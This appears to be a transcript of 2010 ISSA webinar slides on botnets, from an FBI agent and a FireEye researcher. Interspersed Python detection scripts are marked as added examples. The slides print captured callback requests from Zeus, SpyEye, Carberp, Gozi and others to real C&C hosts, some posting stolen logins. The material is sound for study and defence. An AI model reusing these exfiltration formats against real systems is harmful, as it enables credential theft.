Botnets Sponsored by:
ISSA Web Conference October 26, 2010 Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London
Welcome: Conference Moderator
Phillip H Griffin
Member - ISSA Educational Advisory Council, Web Conferences Committee
Agenda
• How Botnets Have Evolved – Chris Calderon - Special Agent, FBI
• Rooting Out the Bad Actors – Alex Lanstein - Systems Consulting Engineer, FireEye
• Joint Speaker Question & Answer
• Closing Comments
UNCLASSIFIED
How Botnets Have Evolved
presented by Special Agent Chris Calderon, FBI
Agenda
• What is a botnet?
• How are botnets created?
• Why are botnets created?
• Basic structure of a botnet
• Taking down a botnet
• How botnets are evolving
• Botnets in the news
• Questions
What is a botnet?
• A network of compromised computers (robots/bots)
• Controlled by a bot master / herder
• Used to carry out various illegal activities
• Services are often sold to other criminal elements
How are botnets created?
Setup
• Obtain reliable infrastructure
• Develop malware and C&C software
Victims
• Malware loaded onto victim machines
• Done through exploits and/or social engineering
Manage
• Continually update software / instructions to bots
• Maintain statistics for the botnet
Why are botnets created?
• Spam
• Distributed Denial of Service (DDoS)
• Click Fraud
• Fake Anti-Virus
• Credential Theft
• Proxy Service
• Cyber Warfare
Basic Structure
[Diagram: Bot Master / Herder → C&C Servers → Victims]
Taking down a botnet
[Diagram: same structure as the Basic Structure slide, Bot Master / Herder → C&C Servers → Victims]
Botnets evolving
[Diagram: Bot Master / Herder → Proxies → C&C Servers → Victims (a proxy layer inserted in front of the C&C servers)]
Botnets evolving
[Diagram: Bot Master / Herder → Proxies → Proxies → C&C Servers → Victims (a second proxy layer added)]
Botnets in the news
• ZEUS
– Steals and logs online banking credentials
– Primarily targets high balance accounts
– Money “mules” used to get money to bad actors
– Kit now used by many different groups
– Estimated $70,000,000 stolen from US banks
Botnets in the news
• MARIPOSA (BUTTERFLY)
– Steals online credentials, and also used in DDoS attacks
– Estimated 12 million infected computers
– Bad actors traced to Spain and arrested
– Criminal proceedings ongoing
Botnets in the news
• SPAM BOTS
– Conficker, Cutwail, Waledac, ….
– Up to 10 million bots per botnet
– Each botnet can send billions of spam emails per day
– Spam used to distribute malware, drive online pharmaceutical sales, fake antivirus software, pay per click advertising, ….
Questions?
Rooting out the Bad Actors
or: p2p, fast flux, and other botnet myths
Alex Lanstein, Senior Security Researcher, FireEye, Inc.
Today’s Agenda
• Understanding the shift from conventional to modern malware, and the resultant hosting needs
• A few TT&P to uncover older or moderately sophisticated malware
• A detailed look at a few bots “in the news”
Conventional vs. Modern, APT Malware
Conventional Malware
• Characterized by using “spreading” techniques, custom C&C transport protocols, IRC communication
– Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots
• Detectable through a variety of technologies/tactics:
– NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS
– Port scanning, high windows port activity, non-http over port 80, non-web traffic, etc.
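The two network-level tactics named on the slide above, "non-http over port 80" and "high windows port activity", as an added example that is not part of the presentation: a small Python checker run over constructed flow records. The function and constant names (flag_flows, SAMPLE_FLOWS) and the five-host threshold for a Windows-port sweep are assumptions.

```python
from collections import defaultdict

# Request-line starts a browser or web client would send; anything else on tcp/80
# is treated as "non-http over port 80" (IRC, custom C&C transports, raw binary).
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"OPTIONS ", b"CONNECT ", b"DELETE ")
WINDOWS_PORTS = {135, 139, 445}   # RPC / NetBIOS / SMB, the classic worm-spreading ports
SCAN_THRESHOLD = 5                # assumed: distinct hosts on Windows ports before we alert


def is_http_start(payload: bytes) -> bool:
    """True if the first client bytes look like an HTTP request line."""
    return payload.startswith(HTTP_METHODS)


def flag_flows(flows):
    """Return a sorted list of (src, reason) alerts.

    Each flow is a dict with keys src, dst, dport and payload (first client bytes).
    """
    alerts = set()
    windows_targets = defaultdict(set)   # src -> distinct hosts it touched on Windows ports
    for f in flows:
        if f["dport"] == 80 and not is_http_start(f["payload"]):
            alerts.add((f["src"], "non-http over port 80"))
        if f["dport"] in WINDOWS_PORTS:
            windows_targets[f["src"]].add(f["dst"])
    for src, targets in windows_targets.items():
        if len(targets) >= SCAN_THRESHOLD:
            alerts.add((src, "high windows port activity"))
    return sorted(alerts)


# Constructed sample flows (not real traffic): one ordinary web request, one IRC-style
# registration sent over tcp/80, and one host sweeping SMB across eight neighbours.
SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "dst": "203.0.113.34", "dport": 80,
     "payload": b"GET / HTTP/1.1\r\nHost: example.com\r\n"},
    {"src": "10.0.0.7", "dst": "198.51.100.9", "dport": 80,
     "payload": b"NICK bot1234\r\nUSER x x x x\r\n"},
] + [
    {"src": "10.0.0.9", "dst": f"10.0.1.{i}", "dport": 445, "payload": b""}
    for i in range(1, 9)
]

if __name__ == "__main__":
    for src, reason in flag_flows(SAMPLE_FLOWS):
        print(f"{src}: {reason}")
```

Both rules are deliberately protocol-agnostic: the first needs only the opening bytes of each flow, the second only 5-tuples, so either can be run over NetWitness/Solera captures or a NIDS flow log without a signature for the specific bot.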
Conventional vs. Modern Malware
Modern-ish malware:
– Characterized by infecting via browser based exploits
– Exploit Channel: PDF, Flash, IE/FireFox, QuickTime, C&C Callback over HTTP(s)
– Malware: ZeuS, Gozi, Koobface, Rustock, Spyeye
– Partially detectable fairly easily through manual traffic analysis, but a full-time resource is needed
World’s Top Malware
[Chart] Source: FireEye Malware Intelligence Lab
Modern Malware Infection Lifecycle
1. System gets exploited
– Drive-by attacks in casual browsing
– Links in targeted emails
– Socially engineered binaries
2. Dropper malware installs
– First step to establish control
– Calls back out to criminal servers
– Found on compromised sites, and Web 2.0, user-created content sites
3. Malicious data theft & long-term control established
– Uploads data stolen via keyloggers, Trojans, bots, & file grabbers
– One exploit leads to dozens of infections on same system
– Criminals have built long-term control mechanisms into system
[Diagram labels: Compromised Web server or Web 2.0 site; Callback Server; Perimeter Security (signature, rule-based); Other gateway (list-based, signatures); Desktop antivirus (losing the threat arms race)]
Where is all this malware being hosted?
• Previously we used to see malware being hosted on infected home machines
• Web filters responded by blocking access to domains that had multiple A records in residential IP space
• Now it’s being hosted on dedicated servers in proper data centers. Sometimes even with their own RIR registered IP space!
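The web-filter heuristic described above (block a domain whose A records are spread across residential IP space), as an added example that is not part of the talk. The "residential" prefix list is a constructed stand-in built from RFC 5737 documentation ranges, the threshold of three records is an assumption, and the third sample domain shows why the move to dedicated data-center hosting with its own IP block slips past this check.

```python
import ipaddress

# Constructed stand-in for a residential-IP-space list (a real one would come from
# ISP / RIR allocation data); RFC 5737 documentation prefixes so nothing real is named.
RESIDENTIAL_NETS = [ipaddress.ip_network(n) for n in ("192.0.2.0/24", "198.51.100.0/24")]
MULTI_A_THRESHOLD = 3   # assumed: residential A records needed before a domain is blocked


def is_residential(ip: str, nets=RESIDENTIAL_NETS) -> bool:
    """True if the address falls in any of the residential prefixes."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def classify_domain(a_records, nets=RESIDENTIAL_NETS, threshold=MULTI_A_THRESHOLD) -> str:
    """'block' when enough A records sit in residential space, otherwise 'allow'."""
    residential = [ip for ip in a_records if is_residential(ip, nets)]
    return "block" if len(residential) >= threshold else "allow"


def filter_zone(dns_answers, **kw):
    """dns_answers: {domain: [A record IPs]} -> {domain: verdict}."""
    return {domain: classify_domain(ips, **kw) for domain, ips in dns_answers.items()}


# Constructed DNS answers: a flux-style domain rotating across home connections, an
# ordinary site on one data-center address, and a "modern" hoster on its own block
# (several A records, none residential), which this heuristic does not catch.
SAMPLE_ANSWERS = {
    "flux.example":   ["192.0.2.10", "192.0.2.77", "198.51.100.5", "198.51.100.200"],
    "shop.example":   ["203.0.113.20"],
    "hosted.example": ["203.0.113.30", "203.0.113.31", "203.0.113.32"],
}

if __name__ == "__main__":
    for domain, verdict in filter_zone(SAMPLE_ANSWERS).items():
        print(f"{domain}: {verdict}")
```

The check is cheap and was effective while C&C sat on infected home machines; once the hosting moved to registered server space, the address-based signal disappears and the callback content itself has to be examined instead.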
Root of the Problem
• There is no “Internet Police”!
• Who controls the Internet? ICANN? IANA? CERTs? USCYBERCOM? Tier 1 ISPs?
• Depends who you ask and how big a stink you make.
How the Internet is delegated
In the name space (think DNS):
• ICANN → Registries
• Registries == Verisign, Affilias, ccTLD operators
• Registries sell to certified gTLD and regional registrars
• Registrars == namecheap.com, godaddy.com, netsol.com
• Registrars sell to registrants (end user)
How the Internet is delegated
In the IP space:
• ICANN/IANA (Internet Assigned Numbers Authority)
• IANA → RIRs
• RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC
• RIRs → LIRs
• LIRs are generally data centers and ISPs
ICANN’t do anything!
• ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the Registrar doesn’t violate the contract. These contracts have no mention of “content”.
• Recent success against EstDomains was due to them having a convicted felon as an Officer of the company.
• Large pushback when someone even suspects they are trying to take an authoritative stance on something.
Big bots in 2010
Rustock – still sticking around
POST /index.php?topic=33.117 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://go-thailand-now.com/
Content-Type: application/x-www-form-urlencoded
Content-Encoding: gzip
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: go-thailand-now.com
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache
Gozi
POST /cgi-bin/forms.cgi HTTP/1.0
Content-Type: multipart/form-data; boundary=------139b9b3139b9b3139b9b3
User-Agent: IE
Host: 91.216.215.130
Content-Length: 453
Pragma: no-cache

------139b9b3139b9b3139b9b3
Content-Disposition: form-data; name="upload_file"; filename="3759777034.21"
Content-Type: application/octet-stream

URL: https://mail.google.com/mail/channel/bind?VER=8&at=KLJASDF133234901 FhI &it=1121&SID=6JK1290NR3A3&RID=4611&AID=95&= mousemove
------139b9b3139b9b3139b9b3--
Zeus
POST /xed/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF)
Host: schastlivieiveselierebyta0001.com
Content-Length: 329
Connection: Keep-Alive
Cache-Control: no-cache

. ....4...A..2.`.Ul...T...... (....4pP.u.x.!.D.!.+...... q.. '7...... 7.....D.0..Y...$...... [(...F...c.|e.y...g.b..t.x...... - [email protected]>.s..j=. ..rY?.-8.c Ss.Gt'.a. ...cU./. .e(....QB.D.S..N0>.5.....I.`:...... ".....;5..U. .t....!...... f.=E.....0Y,.. ..".<.
Tigger – Not just financials anymore
POST /track_c.cgi HTTP/1.0
Content-Length: 81

icin.wembh.rjr...{|.JST]....wSJAUQFN.mST^AJS.bj.i_HUUY_.j[YQ. .J.J.. ...L .
SANDBOX_QEZA1290412412;append;20;Microsoft Windows XP Service Pack 3;post_log;16639;force;[[[URL: https://internal.fireeye.com/login
Title:
SpyEye – ZeuS replacement?
GET /web/map/gate.php?guid=users1!AJKLPQ!JU1232 &ver=10280&stat=ONLINE&plg=ftpbc;socks5;t2p&cpu=0&ccrc=JKL AF24&md5=9012ab902413dcf8gga89 HTTP/1.0
User-Agent: Microsoft Internet Explorer
Host: hahsdhsl.com
Pragma: no-cache

GET /maincp/gate.php?guid=user2!ND93103!893CND1 &ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889 712214bdbee8381337 HTTP/1.0
User-Agent: Microsoft Internet Explorer
Host: www.promohru.in
Pragma: no-cache
Carberp – Yet Another Datastealer
POST /recv.php HTTP/1.1
Host: 194.54.80.146
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en- US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 331

uid=MYWITCH099ABE891209141FGA91AFD&brw=2&type=1 &data=https%3A%2F%2Fwww%2Estarwoodhotels%2Ecom% 2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7 CPOST%3AsuccessPath%3Dhttps%253A%252F%252Fwww %2Estarwoodhotels%2Ecom%252Fpreferredguest%252Finde x%2Ehtml%26login%3DALEXLANSTEIN%2540GMAIL%2EC OM%26persist%3Dtrue%26password%3Dmypassword
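A detection pass over the request shapes shown on the Rustock, Gozi, Zeus, SpyEye and Carberp slides above, as an added example that is not part of the presentation. The sample requests are constructed to mirror those shapes with placeholder hosts and values (none of the real hosts from the slides); the gate-script list, the user-agent pattern and the 0.8 printable-ratio cutoff are assumptions a practitioner would tune to their own traffic.

```python
import re
import string
from urllib.parse import urlsplit, parse_qs, unquote

GATE_SCRIPTS = ("gate.php", "recv.php")          # gate names seen in the slide captures
BROWSER_UA = re.compile(r"^Mozilla/\d\.\d \(")   # genuine IE/Firefox strings start like this
PRINTABLE = set(string.printable.encode())
TEXT_CUTOFF = 0.8                                # assumed: below this the body is "binary"


def parse_request(raw: bytes):
    """Split a raw HTTP request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def printable_ratio(body: bytes) -> float:
    if not body:
        return 1.0
    return sum(b in PRINTABLE for b in body) / len(body)


def score_request(raw: bytes):
    """Return the list of heuristic findings for one request (empty for a clean one)."""
    req = parse_request(raw)
    h, findings = req["headers"], []
    url = urlsplit(req["target"])
    if not BROWSER_UA.match(h.get("user-agent", "")):      # Gozi "IE", SpyEye "Microsoft Internet Explorer"
        findings.append("implausible user-agent")
    if url.path.rsplit("/", 1)[-1] in GATE_SCRIPTS:          # Zeus / SpyEye gate.php, Carberp recv.php
        findings.append("known gate script")
    if h.get("content-encoding", "").lower() == "gzip":      # Rustock: browsers do not gzip requests
        findings.append("gzip-encoded request body")
    if printable_ratio(req["body"]) < TEXT_CUTOFF:           # Zeus: opaque blob posted as a form
        findings.append("non-text request body")
    q = parse_qs(url.query)
    if q.get("stat") == ["ONLINE"] and "md5" in q:           # SpyEye check-in parameters
        findings.append("bot check-in parameters")
    body_q = parse_qs(req["body"].decode("latin-1"))
    if any("password=" in unquote(v) for v in body_q.get("data", [])):   # Carberp form grab
        findings.append("credentials in posted data")
    return findings


# Constructed requests modelled on the slide captures; hosts and values are placeholders.
SAMPLES = {
    "benign": b"GET /index.html HTTP/1.1\r\nHost: www.example\r\n"
              b"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:3.6) Gecko/20100101 Firefox/3.6\r\n\r\n",
    "rustock": b"POST /index.php?topic=33.117 HTTP/1.1\r\nContent-Encoding: gzip\r\n"
               b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\nHost: forum.example\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\n\r\n" + b"\x1f\x8b\x08\x00" + b"\x00" * 20,
    "gozi": b"POST /cgi-bin/forms.cgi HTTP/1.0\r\nContent-Type: multipart/form-data; boundary=----x\r\n"
            b"User-Agent: IE\r\nHost: 192.0.2.50\r\n\r\n------x\r\n"
            b"Content-Disposition: form-data; name=\"upload_file\"; filename=\"1.21\"\r\n\r\n"
            b"URL: https://mail.example/bind\r\n------x--\r\n",
    "zeus": b"POST /xed/gate.php HTTP/1.1\r\nAccept: */*\r\n"
            b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0)\r\n"
            b"Host: cnc.example\r\n\r\n" + bytes(range(40)),
    "spyeye": b"GET /web/map/gate.php?guid=u1!A!B&ver=10280&stat=ONLINE&plg=ftpbc;socks5&cpu=0&ccrc=X&md5=0123 HTTP/1.0\r\n"
              b"User-Agent: Microsoft Internet Explorer\r\nHost: cnc.example\r\n\r\n",
    "carberp": b"POST /recv.php HTTP/1.1\r\nHost: 192.0.2.60\r\n"
               b"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
               b"uid=ABC123&brw=2&type=1&data=https%3A%2F%2Fwww%2Eexample%2Ecom%2Fsign%5Fin%7CPOST%3A"
               b"login%3Duser%2540example%2Ecom%26password%3Dsecret",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name}: {score_request(raw) or 'clean'}")
```

Each heuristic is weak on its own (a short user-agent or a gate.php path has benign explanations), which is why the function returns the whole list rather than a single verdict: the analyst doing the "manual traffic analysis" the earlier slide mentions wants the combination, and two or more findings on one request is a far better queue filter than any one of them.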
TDSS – Full on SSL
• 19:11:56.590979 IP 194.28.113.21.443 > 192.168.2.44.54528: tcp 620 ....E [email protected]...... J[z7l.:...... J...F..L...N.]...xmvF..(..l...?},,nc{. .ygs.R...._...... 8.a#9cU....I..5...... 0...0..j. ...yV.9.x0 . *.H...... 0E1.0 ..U....AU1.0...U…Some-State1!0...U...Internet Widgits Pty Ltd0.. 100114192303Z. 110114192303Z0E1.0 .U....AU1.0...U…Some-State1!0...U...Internet Widgits Pty Ltd0..0 . *.H...... 0...... |.<..7...dt..IF0.~...;-..m.>.~Ra!f...- [email protected] ....]P.*.....W.C...N5.(...Ux.z.._....W...b....*.P....AX.....(...... E.....0 . *.H...... @..p.Iru...Q.$K)..EF;....u.X...... <... .;}....aa~>r.l.\...... [.r.0@...... %....S`...p.... .=3;[email protected]^7...... "Zw..5.)g......
Thank you!
Alex Lanstein [email protected]
www.fireeye.com For late-breaking malware research and news: blog.fireeye.com
FireEye, Inc. Confidential
Joint Speaker Question & Answer
• Chris Calderon – Special Agent, FBI
• Alex Lanstein – Systems Consulting Engineer, FireEye
Closing Remarks
Thank you to FireEye for their support of ISSA and this Web Conference
Thank you to Citrix for donating this Webcast service
CPE Credit
• Within 24 hours of the conclusion of this webcast, you will receive a link to a post Web Conference quiz.
• After the successful completion of the quiz you will be given an opportunity to PRINT a certificate of attendance to use for the submission of CPE credits.